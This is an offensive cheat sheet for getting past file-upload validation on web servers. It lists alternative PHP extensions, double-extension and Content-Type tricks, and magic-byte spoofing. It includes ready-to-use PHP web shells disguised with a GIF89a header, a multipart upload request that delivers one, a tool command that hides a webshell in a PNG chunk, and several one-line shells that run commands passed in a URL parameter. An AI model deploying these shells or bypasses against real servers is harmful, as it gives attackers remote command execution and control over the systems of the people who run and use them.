File Upload Tricks

When uploading files , check for validation on :

1. File extension

   • Server side extension allowed ? :

   php
   phtml
   php4

   • Stacking / Double Extension

   .php.png
   .%20.php

Using gif (shell.php)

GIF89a;
<?php
system($_GET['cmd']);
?>

Advanced gif

Content-Disposition: form-data; name="upload"; filename="web.php"
Content-Type: image/png

GIF89a;
<?php
system($_GET['cmd']);
?>

1. Content-Type header

• Is server extension like php able to bypass the upload restriction ?

- If yes , just change content-type header to like image and it will still run as php.

• Does the server validate content-type header like disallow application/json?

1. Magic bytes (file hex value)

• Does the server check file signature ?

• If no , can change file signature using hexedit

PHP Function Exploit

imagecopyresampled imagecreatefromstring

solution :Hide the webshell in the IDAT chunk of PNG

https://github.com/huntergregal/PNG-IDAT-Payload-Generator/tree/master

python3 generate.py -m php -o webshell.png

Rename to webshell.png.php

Shell exec

php

shell_exec() , exec() , system()

Examples

<?php echo shell_exec($_GET['command']); ?>
<?php echo exec($_GET['command']); ?>
<?php echo system($_GET['command']); ?>

<?php echo exec($_GET['e'].' 2>&1'); ?>
<?php system($_GET['e'].' 2>&1'); ?>
<?php echo shell_exec($_GET['e'].' 2>&1'); ?>

Content-Types of Common Files

Pictures :

image/png
image/jpeg
image/gif

JSON :

application/json

PHP :

application/x-php
application/x-www-form-urlencoded
multipart/form-data
application/octet-stream

TXT :

text/plain

XML :

application/xml  
text/xml

HTML :

text/html

JAVASCRIPT :

text/javascript
application/javascript

PDF

application/pdf

AUDIO

audio/mpeg
audio/wav

VIDEO

video/mp4
video/quicktime